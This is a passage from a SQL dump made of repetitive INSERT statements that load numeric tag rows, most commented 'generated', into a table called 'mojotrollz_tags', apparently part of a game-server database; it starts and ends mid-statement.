`comment`) VALUES (5470, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5471, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5471, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5472, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5472, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5473, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5473, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5474, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5474, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5475, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5475, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5476, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5476, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5477, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5477, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5479, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5479, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5480, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5480, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5481, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5481, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5482, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5482, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5483, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5483, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5484, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5484, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5485, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5485, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5489, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5489, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5490, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5490, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5491, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5491, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5492, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5492, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5493, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5493, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5494, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5494, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5495, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5495, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5496, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5496, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5497, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5497, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5498, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5498, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5499, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5499, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5500, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5500, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5501, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5501, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5502, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5502, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5503, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5503, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5504, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5504, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5505, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5505, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5506, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5506, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5508, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5508, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5509, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5509, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5510, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5510, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5511, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5511, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5512, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5512, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5513, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5513, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5514, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5514, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5515, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5515, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5516, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5516, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5517, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5517, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5518, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5518, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5519, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5519, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5520, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5520, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5523, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5523, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5543, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5543, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5546, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5546, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5547, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5547, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5564, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5564, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5565, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5565, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5566, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5566, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5567, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5567, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5568, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5568, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5569, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5570, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5570, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5591, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5591, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5592, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5592, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5593, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5593, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5594, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5594, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5595, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5595, 1, 2, 1537, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5595, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5597, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5597, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5597, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5597, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5597, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5597, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5598, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5598, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5599, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5599, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5600, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5600, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5601, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5601, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5602, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5602, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5603, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5603, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5605, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5605, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5606, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5606, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5606, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5606, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5606, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5606, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5607, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5607, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5608, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5608, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5609, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5609, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5609, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5609, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5609, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5609, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5610, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5610, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5610, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5610, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5610, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5610, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5611, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5611, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5611, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5611, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5611, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5611, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5612, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5612, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5613, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5613, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5613, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5613, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5613, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5613, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5614, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5614, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5614, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5614, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5614, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5614, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5615, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5615, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5616, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5616, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5617, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5617, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5618, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5618, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5620, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5620, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5622, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5622, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5623, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5623, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5624, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5624, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5624, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5624, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5624, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5634, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5634, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5635, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5635, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5636, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5636, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5637, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5637, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5638, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5638, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5639, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5639, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5639, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5639, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5639, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5639, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5640, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5640, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5640, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5640, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5640, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5640, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5641, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5641, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5642, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5642, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5643, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5643, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5644, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5644, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5645, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5645, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5646, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5646, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5647, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES 